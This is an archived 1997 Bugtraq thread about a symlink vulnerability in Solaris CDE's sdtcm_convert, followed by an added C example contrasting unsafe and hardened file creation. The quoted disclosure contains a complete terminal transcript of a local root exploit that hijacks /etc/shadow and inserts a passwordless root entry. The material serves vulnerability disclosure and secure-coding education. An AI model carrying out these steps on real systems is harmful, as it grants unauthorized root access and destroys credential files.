Bugtraq mailing list archives
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
From: shuque () SAS UPENN EDU (Shumon Huque)
Date: Sun, 23 Feb 1997 15:40:43 -0500
I don't know what exactly 103670-02 fixed but this exploit didn't work on my machine - 2.5.1, CDE 1.0.2 with 103670-02 applied. The symlink /tmp/calorig.user was removed and replaced by a plain file owned by user.
> Is this the bug fixed in the Sun patches:
>
> 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
> 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
> 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
> 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
>
> or is it a new one?
>
> That's hard to know, since this patch is not publicly available off SunSolve (not right now, anyway). There's at least one other hole in sdtcm_convert which this patch may or may not fix. CDE is generally a can of worms.
>
> $Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
>
> Script started on Thu Jul 11 22:15:03 1996
> 22:15 [wumpus:~] % whoami
> adam
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -r--------   1 root     sys          291 Jul 11 22:14 /etc/shadow
> 22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
> 22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
> Loading the calendar ...
> WARNING!! Data will be lost when converting version 4 data format back to version 3 data format.
> Do you want to continue? (Y/N) [Y] y
> Doing conversion ...
> Writing out new file ...
> Conversion done successfully.
> Total number of appointments = 0
> Number of one-time appointments converted = 0
> Number of repeating appointments converted = 0
> Number of one-time appointments pruned = 0
> Number of repeating appointments pruned = 0
> The original file is saved in /tmp/calorig.adam
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -r--rw----   1 adam     daemon      3114 Jul 11 22:15 /etc/shadow
> 22:15 [wumpus:~] % chmod 644 /etc/shadow
> 22:15 [wumpus:~] % cp /dev/null /etc/shadow
> cp: overwrite /etc/shadow (y/n)? y
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -rw-r--r--   1 adam     daemon         0 Jul 11 22:15 /etc/shadow
> 22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
> 22:16 [wumpus:~] % su
> # id
> uid=0(root) gid=1(other)
> # exit
> script done on Thu Jul 11 22:16:21 1996
>
> adam
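The transcript above turns on one detail: a privileged program writes its "original file" backup to a predictable path under /tmp and follows whatever symlink the user has planted there. As an added example (not code from the post, the thread or Sun's sdtcm_convert), here is that open pattern in C next to the hardened form a setuid program should use, plus a self-contained re-creation of the scenario in a scratch directory; the function names, the scratch directory and the "victim" file standing in for /etc/shadow are hypothetical.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the transcript shows: a privileged process opens a predictable
 * path in /tmp for writing. fopen("w") follows a symlink the user planted, so
 * whatever the link points to is truncated and rewritten with the caller's rights. */
int unsafe_save_original(const char *path, const char *data) {
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs(data, f);
    return fclose(f) == 0 ? 0 : -1;
}

/* Hardened form: create the file only if nothing is there yet, never follow a
 * symlink, and confirm through the descriptor that we got a fresh regular file. */
int safe_save_original(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;                 /* EEXIST/ELOOP: path was planted */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    size_t len = strlen(data);
    int rc = (write(fd, data, len) == (ssize_t)len) ? 0 : -1;
    return close(fd) == 0 ? rc : -1;
}

/* Constructed scenario (hypothetical paths): a "victim" file stands in for
 * /etc/shadow and "calorig.user" is a symlink to it, as in the transcript.
 * Returns 1 when the unsafe writer clobbers the victim and the hardened writer refuses. */
int demo_symlink_attack(void) {
    char dir[] = "/tmp/calorig-demo-XXXXXX", victim[256], lnk[256], buf[64] = {0};
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/calorig.user", dir);
    FILE *v = fopen(victim, "w"); if (v == NULL) return 0; fputs("secret\n", v); fclose(v);
    if (symlink(victim, lnk) != 0) return 0;
    int safe_rc = safe_save_original(lnk, "backup\n");     /* expect -1 */
    int unsafe_rc = unsafe_save_original(lnk, "backup\n"); /* expect 0 */
    FILE *r = fopen(victim, "r"); if (r) { fgets(buf, sizeof buf, r); fclose(r); }
    unlink(lnk); unlink(victim); rmdir(dir);
    return safe_rc == -1 && unsafe_rc == 0 && strcmp(buf, "backup\n") == 0;
}
```

The hardened open fails with EEXIST (or ELOOP) whenever anything already sits at the backup path, which is exactly the condition the transcript's `ln -s` created; treating that as a hard error, rather than retrying or deleting the entry, is what closes the race.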